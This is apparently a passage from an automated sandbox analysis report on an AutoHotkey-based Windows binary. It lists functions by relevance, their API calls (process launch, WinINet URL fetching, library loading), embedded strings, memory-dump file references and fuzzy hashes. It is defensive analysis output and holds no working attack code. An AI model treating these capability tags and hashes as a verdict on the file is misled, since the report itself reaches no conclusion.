IsDlgButtonChecked.USER32 ref: 0000000140018851
IsDlgButtonChecked.USER32 ref: 0000000140018869
ShowWindow.USER32 ref: 0000000140018878
ShowWindow.USER32 ref: 0000000140018887
ShowWindow.USER32 ref: 000000014001889E
SetWindowLongW.USER32 ref: 00000001400188B2
LoadAcceleratorsW.USER32 ref: 00000001400188C4

Strings

Shell_TrayWnd, xrefs: 0000000140018635
AutoHotkey2, xrefs: 00000001400185C9
edit, xrefs: 00000001400186F5
C:\Users\user\Desktop, xrefs: 00000001400184C7
P, xrefs: 000000014001854E
Consolas, xrefs: 00000001400187E3
AutoHotkey, xrefs: 00000001400184FB
CreateWindow, xrefs: 0000000140018753
Lucida Console, xrefs: 00000001400187C3
RegClass, xrefs: 00000001400185F3

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Resource$Window$Load$Create$ClassShow$ButtonCapsCheckedDeviceFindLibraryLockMenuMetricsRegisterSystem$AcceleratorsCursorEnableEnumFontForegroundFreeFromIconItemLongNameNamesReleaseSizeof
String ID: AutoHotkey$AutoHotkey2$C:\Users\user\Desktop$Consolas$CreateWindow$Lucida Console$P$RegClass$Shell_TrayWnd$edit
API String ID: 2916389481-3248659932
Opcode ID: a7eddf3aa53c67af6d7525cfe5bf920316d34c5c9aa0d2fc96734a683c634aca
Instruction ID: 73b09161c7793541a1af2631c91434c6f009a098228376b2858bb7f75dd8e53b
Opcode Fuzzy Hash: a7eddf3aa53c67af6d7525cfe5bf920316d34c5c9aa0d2fc96734a683c634aca
Instruction Fuzzy Hash: 5EC15732608B4186E762CB66F85039A73A4FB8CBD4F64012AEF8957BB4DF79C545DB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140036D50, Relevance: 54.9, APIs: 12, Strings: 19, Instructions: 605processlibraryloaderCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 0000000140037271
CloseHandle.KERNEL32 ref: 0000000140037284
CloseHandle.KERNEL32 ref: 00000001400372E0
GetLastError.KERNEL32 ref: 00000001400372EE
SetCurrentDirectoryW.KERNEL32 ref: 0000000140037433
GetFileAttributesW.KERNEL32 ref: 00000001400374AF
SetCurrentDirectoryW.KERNEL32 ref: 00000001400374F7
ShellExecuteExW.SHELL32 ref: 0000000140037514
GetModuleHandleW.KERNEL32 ref: 000000014003755A
GetProcAddress.KERNEL32 ref: 000000014003756A
GetLastError.KERNEL32 ref: 00000001400375D1
FormatMessageW.KERNEL32 ref: 0000000140037621

Strings

C:\Users\user\Desktop, xrefs: 00000001400374F0
Failed attempt to launch program or document:, xrefs: 00000001400376B7
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 000000014003769D
print, xrefs: 0000000140036E6E, 0000000140036F8A
\/., xrefs: 0000000140037463
explore, xrefs: 0000000140036E35, 0000000140036F51
open, xrefs: 0000000140036E48, 0000000140036F64
Launch Error (possibly related to RunAs):, xrefs: 0000000140037691
.exe.bat.com.cmd.hta, xrefs: 000000014003749B
kernel32.dll, xrefs: 0000000140037553
edit, xrefs: 0000000140036E5B, 0000000140036F77
..., xrefs: 0000000140037674
find, xrefs: 0000000140036E22, 0000000140036F3E
Verb: <%s>, xrefs: 0000000140037630
%s %s, xrefs: 0000000140037147
System verbs unsupported with RunAs., xrefs: 0000000140037039
properties, xrefs: 0000000140036E81, 0000000140036F9D, 000000014003736A
String too long., xrefs: 0000000140037079
GetProcessId, xrefs: 0000000140037563

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Handle$CloseCurrentDirectoryErrorLast$AddressAttributesCreateExecuteFileFormatMessageModuleProcProcessShell
String ID: Verb: <%s>$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$%s %s$...$.exe.bat.com.cmd.hta$C:\Users\user\Desktop$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
API String ID: 187721205-1434475109
Opcode ID: 3968db029ad8d3e66e87284500ae8787545f3695a037a24b117d87ca97fb51b9
Instruction ID: 6f62d6a1c93159f937a9816b4878b059c86c2063e0ceea868771e16a936fae1d
Opcode Fuzzy Hash: 3968db029ad8d3e66e87284500ae8787545f3695a037a24b117d87ca97fb51b9
Instruction Fuzzy Hash: 97527B32205B8095EB779F62E8507EA27A4FB48BD8F444225FB5D47BE9EB38C645C340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140060290, Relevance: 52.8, APIs: 21, Strings: 9, Instructions: 284libraryloadernetworkCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32 ref: 00000001400602B7
GetProcAddress.KERNEL32 ref: 000000014006034C
GetProcAddress.KERNEL32 ref: 000000014006035F
GetProcAddress.KERNEL32 ref: 0000000140060372
GetProcAddress.KERNEL32 ref: 0000000140060387
GetProcAddress.KERNEL32 ref: 00000001400603A1
InternetOpenW.WININET ref: 000000014006044F
InternetOpenUrlW.WININET ref: 0000000140060473
FreeLibrary.KERNEL32 ref: 00000001400604B3

Strings

InternetReadFileExA, xrefs: 0000000140060378
InternetOpenUrlW, xrefs: 0000000140060352
wininet, xrefs: 00000001400602B0
InternetCloseHandle, xrefs: 0000000140060365
InternetOpenW, xrefs: 000000014006032A
AutoHotkey, xrefs: 0000000140060444
InternetReadFile, xrefs: 000000014006038D
*, xrefs: 00000001400603F5
8, xrefs: 00000001400604C8

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AddressProc$InternetLibraryOpen$FreeLoad
String ID: *$8$AutoHotkey$InternetCloseHandle$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExA$wininet
API String ID: 1118542655-1258707600
Opcode ID: 9dda6862bb6cb6d395320f1e7c764055814d3e8041ec8412b42ea5d1444ba3f8
Instruction ID: 651c9e9b9ea13995745d58a18d3834e5215b36bdfc8b4330a4deca5872105af2
Opcode Fuzzy Hash: 9dda6862bb6cb6d395320f1e7c764055814d3e8041ec8412b42ea5d1444ba3f8
Instruction Fuzzy Hash: 5AC1AD72205B8286EB669B22E8507EA23A1FB8CBD8F944515BF4D07BB4DF7CC545CB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140017E10, Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 250comwindowclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014000A2B0: CreateThread.KERNEL32 ref: 000000014000A325
Part of subcall function 000000014000A2B0: SetThreadPriority.KERNEL32 ref: 000000014000A343
Part of subcall function 000000014000A2B0: PostThreadMessageW.USER32 ref: 000000014000A381
Part of subcall function 000000014000A2B0: Sleep.KERNEL32 ref: 000000014000A38E
Part of subcall function 000000014000A2B0: GetTickCount.KERNEL32 ref: 000000014000A39D
Part of subcall function 000000014000A2B0: PeekMessageW.USER32 ref: 000000014000A3CA

Shell_NotifyIconW.SHELL32 ref: 0000000140017E4C
IsWindow.USER32 ref: 0000000140017E69
DestroyWindow.USER32 ref: 0000000140017E77
DeleteObject.GDI32 ref: 0000000140017E87
DeleteObject.GDI32 ref: 0000000140017E97
DeleteObject.GDI32 ref: 0000000140017EA7
DeleteObject.GDI32 ref: 0000000140017ECE
DestroyCursor.USER32 ref: 0000000140017ED7
IsWindow.USER32 ref: 0000000140017EE7
DestroyWindow.USER32 ref: 0000000140017EF6
DeleteObject.GDI32 ref: 0000000140017F06
DeleteObject.GDI32 ref: 0000000140017F16
DeleteObject.GDI32 ref: 0000000140017F26
DeleteObject.GDI32 ref: 0000000140017F84
DestroyCursor.USER32 ref: 0000000140017FAA
DestroyCursor.USER32 ref: 0000000140017FB8
IsWindow.USER32 ref: 0000000140017FFD
DestroyWindow.USER32 ref: 000000014001800B
DeleteObject.GDI32 ref: 0000000140018028
ChangeClipboardChain.USER32 ref: 000000014001807B
mciSendStringW.WINMM ref: 00000001400180A7
mciSendStringW.WINMM ref: 00000001400180C5
RtlDeleteCriticalSection.NTDLL ref: 00000001400180D3
OleUninitialize.OLE32 ref: 00000001400180DA

Part of subcall function 000000014007C2A0: DeleteObject.GDI32 ref: 000000014007C378

Strings

status AHK_PlayMe mode, xrefs: 00000001400180A0
close AHK_PlayMe, xrefs: 00000001400180BE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Delete$Object$DestroyWindow$CursorThread$MessageSendString$ChainChangeClipboardCountCreateCriticalIconNotifyPeekPostPrioritySectionShell_SleepTickUninitialize
String ID: close AHK_PlayMe$status AHK_PlayMe mode
API String ID: 2570309754-1474590089
Opcode ID: 988ddb77dfff803cabcd832017b6ce81a8a39f0e2dc2aec634d971736a313c96
Instruction ID: 9b9916c1188f6518bedc1de11fc532d5d2bbbdc704a27a1e11cc991b7c2fc2c7
Opcode Fuzzy Hash: 988ddb77dfff803cabcd832017b6ce81a8a39f0e2dc2aec634d971736a313c96
Instruction Fuzzy Hash: 5FB1497130160086FB67DF63E8947E923A4FB9EBD5F195125AB4E47AB5CF3AC8458300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140004530, Relevance: 40.6, APIs: 13, Strings: 10, Instructions: 393COMMON

Download Yara Rule

APIs

RtlInitializeCriticalSection.NTDLL ref: 000000014000455D
SetErrorMode.KERNEL32 ref: 0000000140004568
GetCurrentDirectoryW.KERNEL32 ref: 000000014000457D

Strings

/force, xrefs: 0000000140004724
C:\Users\user\Desktop, xrefs: 000000014000456E
/ErrorStdOut, xrefs: 0000000140004737
Could not close the previous instance of this script. Keep waiting?, xrefs: 0000000140004A03
An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta, xrefs: 000000014000496B
Out of memory., xrefs: 00000001400046B3
AutoHotkey, xrefs: 0000000140004937, 00000001400049A4
/restart, xrefs: 00000001400046FE
Clipboard, xrefs: 0000000140004B0A, 0000000140004B2C
d, xrefs: 00000001400049F0

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CriticalCurrentDirectoryErrorInitializeModeSection
String ID: /ErrorStdOut$/force$/restart$An older instance of this script is already running. Replace it with this instance?Note: To avoid this message, see #SingleInsta$AutoHotkey$C:\Users\user\Desktop$Clipboard$Could not close the previous instance of this script. Keep waiting?$Out of memory.$d
API String ID: 3837189584-2158089965
Opcode ID: 55a1703addd651e2ed7b0588b5d36d59236cd5c6e871c051e882d242094326d2
Instruction ID: 9c785f6b70de96b1686ce543ae4cd559ff567db452573ca88fea3f37155f9ccc
Opcode Fuzzy Hash: 55a1703addd651e2ed7b0588b5d36d59236cd5c6e871c051e882d242094326d2
Instruction Fuzzy Hash: 420290B1604B8086FB27DB26E8543EA23A0FB9D7C8F445225FB49476B6EF78C585C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140088BA0, Relevance: 19.7, APIs: 13, Instructions: 151windowlibraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 0000000140088BD1
EnumResourceNamesW.KERNEL32 ref: 0000000140088C26
FindResourceW.KERNEL32 ref: 0000000140088C3A
LoadResource.KERNEL32 ref: 0000000140088C4F
LockResource.KERNEL32 ref: 0000000140088C69
GetSystemMetrics.USER32 ref: 0000000140088C89
FindResourceW.KERNEL32 ref: 0000000140088CF2
LoadResource.KERNEL32 ref: 0000000140088D06
LockResource.KERNEL32 ref: 0000000140088D14
SizeofResource.KERNEL32 ref: 0000000140088D28
CreateIconFromResourceEx.USER32 ref: 0000000140088D4B
FreeLibrary.KERNEL32 ref: 0000000140088D64
ExtractIconW.SHELL32 ref: 0000000140088D8B

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Resource$Load$FindIconLibraryLock$CreateEnumExtractFreeFromMetricsNamesSizeofSystem
String ID:
API String ID: 766211583-0
Opcode ID: 95c6b5e12db596f9249207a079bfe9c7874d7d4b58b5f8b4b471b46c433ac0dd
Instruction ID: dfac577ef48a5a5c120e17db4d3737aba51e79a8b467db727ab3d49fd5557cc5
Opcode Fuzzy Hash: 95c6b5e12db596f9249207a079bfe9c7874d7d4b58b5f8b4b471b46c433ac0dd
Instruction Fuzzy Hash: 9A51B373305B9089EBBA9F17A4503AA67A1F78DBD0F184425EF4A877A4DF3DCA458700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140019030, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 292windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32 ref: 000000014001907F
IsWindow.USER32 ref: 000000014001908C
SetCurrentDirectoryW.KERNEL32 ref: 00000001400191D3
DestroyWindow.USER32 ref: 0000000140019314
IsWindow.USER32 ref: 00000001400194BD
DestroyWindow.USER32 ref: 00000001400194DA

Strings

Critical Error: %sThe program will exit., xrefs: 0000000140019052
C:\Users\user\Desktop, xrefs: 00000001400191CC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Destroy$CurrentDirectoryMessage
String ID: C:\Users\user\Desktop$Critical Error: %sThe program will exit.
API String ID: 1189175353-1331358602
Opcode ID: 9bbeeb403c5bfc2ba8af28841df91fba33385387a113de8549a01769c38b0a30
Instruction ID: 36f37365731f2a18f040d79cdac14066c7069faa25c5d67a3cbb5e0d87956fc6
Opcode Fuzzy Hash: 9bbeeb403c5bfc2ba8af28841df91fba33385387a113de8549a01769c38b0a30
Instruction Fuzzy Hash: 75E19272608B8486F712CB2AD5543E977A0F79DBC8F145219EF89077B6CB7AD185C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140087B90, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 123fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32 ref: 0000000140087CAF
FindClose.KERNEL32 ref: 0000000140087CC5
FindFirstFileW.KERNEL32 ref: 0000000140087D07
FindClose.KERNEL32 ref: 0000000140087D16

Strings

%s\, xrefs: 0000000140087CD8

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID: %s\
API String ID: 2295610775-2802346739
Opcode ID: c55ea80dd8361b6dd9a7adcd8509633d83f68de654f0f718b2946b281d1a4a7b
Instruction ID: aba4fd5e3e19b987a314c6d452651bf1bdcaa1ea92963235e971e753797e3dc0
Opcode Fuzzy Hash: c55ea80dd8361b6dd9a7adcd8509633d83f68de654f0f718b2946b281d1a4a7b
Instruction Fuzzy Hash: 8551937230578181EA269B13E5103E96361FB99BE4F444326AB6D03BF9EF3CC646C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140087A90, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32 ref: 0000000140087B13
FindFirstFileW.KERNEL32 ref: 0000000140087B43
FindClose.KERNEL32 ref: 0000000140087B52

Strings

\\?\, xrefs: 0000000140087ABC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FileFind$AttributesCloseFirst
String ID: \\?\
API String ID: 48322524-4282027825
Opcode ID: 8a89e9ead25a70c40f62c924fdbe2f1e86a58242bc7418eb98cac0e4918146c8
Instruction ID: 8e41ce4198fb2cb96dbcf85ea5c427dca6283acd237d681e426d3129d309b0da
Opcode Fuzzy Hash: 8a89e9ead25a70c40f62c924fdbe2f1e86a58242bc7418eb98cac0e4918146c8
Instruction Fuzzy Hash: E921F87770464182EF668F17E0547E923A1BB59BE4F884220EB6D076F9EB38CE84C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004438A, Relevance: 3.1, APIs: 2, Instructions: 51windowtimenativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 0000000140044216
SendMessageTimeoutW.USER32 ref: 0000000140044294
PostMessageW.USER32 ref: 00000001400442C5
PostMessageW.USER32 ref: 000000014004431B
SendMessageTimeoutW.USER32 ref: 0000000140044353
PostMessageW.USER32 ref: 00000001400443E3

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Message$Post$SendTimeout$NtdllProc_Window
String ID:
API String ID: 3597852478-0
Opcode ID: f2725e88c31a7300c498843fce3fa027501e10726dd1feaa488de8f07cb8b9b7
Instruction ID: 079ae915cdf3f31a14a1e7c6cd7841e411468b53c429aeb3cfb1b856cdf9442c
Opcode Fuzzy Hash: f2725e88c31a7300c498843fce3fa027501e10726dd1feaa488de8f07cb8b9b7
Instruction Fuzzy Hash: 7811827531468085FFB68B2765457D91790A74DFD8F560832EF4A53BB1CA35C842C708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043C8B, Relevance: 3.0, APIs: 2, Instructions: 21nativewindowCOMMON

Download Yara Rule

APIs

SetFocus.USER32 ref: 0000000140043C9F
NtdllDefWindowProc_W.NTDLL ref: 0000000140044216

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: FocusNtdllProc_Window
String ID:
API String ID: 3543279991-0
Opcode ID: 8317b0577f79755d6bfc1f93b8a5c4608fa031c3c58d3545b712a417d4ade812
Instruction ID: 7db932943ab69e18b79905492fb89ee9fc002677acac39472a10d7198d4f9a34
Opcode Fuzzy Hash: 8317b0577f79755d6bfc1f93b8a5c4608fa031c3c58d3545b712a417d4ade812
Instruction Fuzzy Hash: 77F06D36314A8085D762CB53A8503D93361F74CBD0F854422EF4953B34CE74C9879708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043C50, Relevance: 1.5, APIs: 1, Instructions: 28windowtimenativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 0000000140044216
SendMessageTimeoutW.USER32 ref: 0000000140044294
PostMessageW.USER32 ref: 00000001400442C5
PostMessageW.USER32 ref: 000000014004431B
SendMessageTimeoutW.USER32 ref: 0000000140044353

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Message$PostSendTimeout$NtdllProc_Window
String ID:
API String ID: 2465591236-0
Opcode ID: 61911002ad648096312fd855c5da16de1c8ed31594efadfb8b27a8c531b4e77a
Instruction ID: 07c12cee0ed2b57fecf16b802dc470e1178529735de6d3b0dfdb9f3f06d7a3f8
Opcode Fuzzy Hash: 61911002ad648096312fd855c5da16de1c8ed31594efadfb8b27a8c531b4e77a
Instruction Fuzzy Hash: 95F0B436314A8195E763DB63B5007D52360F34CBC8F454863EF4953A75CE74C946D344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043CAC, Relevance: 1.5, APIs: 1, Instructions: 28windowtimenativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 0000000140044216
SendMessageTimeoutW.USER32 ref: 0000000140044294
PostMessageW.USER32 ref: 00000001400442C5
PostMessageW.USER32 ref: 000000014004431B
SendMessageTimeoutW.USER32 ref: 0000000140044353

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Message$PostSendTimeout$NtdllProc_Window
String ID:
API String ID: 2465591236-0
Opcode ID: f4ea5da0687a735f126ef4b8192c11c702773a6a9f70e7de9f98a952480e11dc
Instruction ID: cb4c00f2cac1051b9df3bb20741ef702d85688ca77bbc88bbfdde92e84ff43c5
Opcode Fuzzy Hash: f4ea5da0687a735f126ef4b8192c11c702773a6a9f70e7de9f98a952480e11dc
Instruction Fuzzy Hash: 75F08236304A8481EBB7DB9396003E527A0B74DBC8F9A4422FF56137B5CE74C8429708

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140043CD9, Relevance: 1.5, APIs: 1, Instructions: 27windowtimenativeCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL ref: 0000000140044216
SendMessageTimeoutW.USER32 ref: 0000000140044294
PostMessageW.USER32 ref: 00000001400442C5
PostMessageW.USER32 ref: 000000014004431B
SendMessageTimeoutW.USER32 ref: 0000000140044353

Part of subcall function 000000014007DE20: DrawIconEx.USER32 ref: 000000014007DEC7

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
